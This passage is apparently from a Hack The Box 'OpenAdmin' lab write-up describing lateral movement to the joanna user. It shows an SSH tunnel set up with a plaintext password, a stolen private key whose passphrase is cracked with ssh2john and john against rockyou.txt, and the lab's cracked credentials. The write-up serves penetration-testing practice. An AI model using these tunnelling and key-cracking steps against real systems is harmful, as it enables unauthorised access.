Joanna
in order for me to access the internal web server running on localhost:52846, I would need to tunnel it to expose that.
While there are many ways to tunnel an internal service, I will just use SSH
SSH tunnel
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ sshpass -pn1nj4W4rri0R! ssh -L 127.0.0.1:8888:127.0.0.1:52846 -N -f jimmy@$IP SSH tunneling via binding host’s 127.0.0.1:8888 to the target’s 127.0.0.1:52856
I will now be able to reach the target’s 127.0.0.1:52856 via Kali’s 127.0.0.1:8888
This can be done REVERSE, but I don’t want to provide the password for Kali. so.
I can see the expected login page; /var/www/internal/index.php
Providing the cracked password
This must be the SSH private key for the joanna user
I will get this and SSH to the target host as the joanna user
ssh2john
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ssh joanna@$IP -i id_rsa.joanna
enter passphrase for key 'id_rsa.joanna':
joanna@10.10.10.171's password: I can’t just use the key as thejoanna’s SSH private key is password-protected
I will have to crack the password for the SSH private key For this operation, I will use ssh2john
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ssh2john id_rsa.joanna > id_rsa.joanna.john This will convert the SSH private key to crack-able file that john can work with
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ john id_rsa.joanna.john --wordlist=/usr/share/wordlists/rockyou.txt
using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa.joanna.john)
1g 0:00:00:02 DONE (2022-10-11 18:55) 0.3906g/s 3740Kp/s 3740Kc/s 3740KC/s bloodofyouth..bloodmore23
Use the "--show" option to display all of the cracked passwords reliablyI can then just load it in and have john crack the password
password for the joanna’s SSH private key is bloodninjas
SSH
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ssh joanna@$IP -i id_rsa.joanna
Enter passphrase for key 'id_rsa.joanna': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jan 12 18:05:20 UTC 2023
System load: 0.0 Processes: 182
Usage of /: 33.3% of 7.81GB Users logged in: 1
Memory usage: 15% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$ whoami
joanna
joanna@openadmin:~$ hostname
openadmin
joanna@openadmin:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.171 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:a730 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:a730 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:a7:30 txqueuelen 1000 (Ethernet)
RX packets 1658754 bytes 309436221 (309.4 MB)
RX errors 0 dropped 100 overruns 0 frame 0
TX packets 1656666 bytes 768305943 (768.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 11470 bytes 900250 (900.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11470 bytes 900250 (900.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0I am now on the target host as the joanna user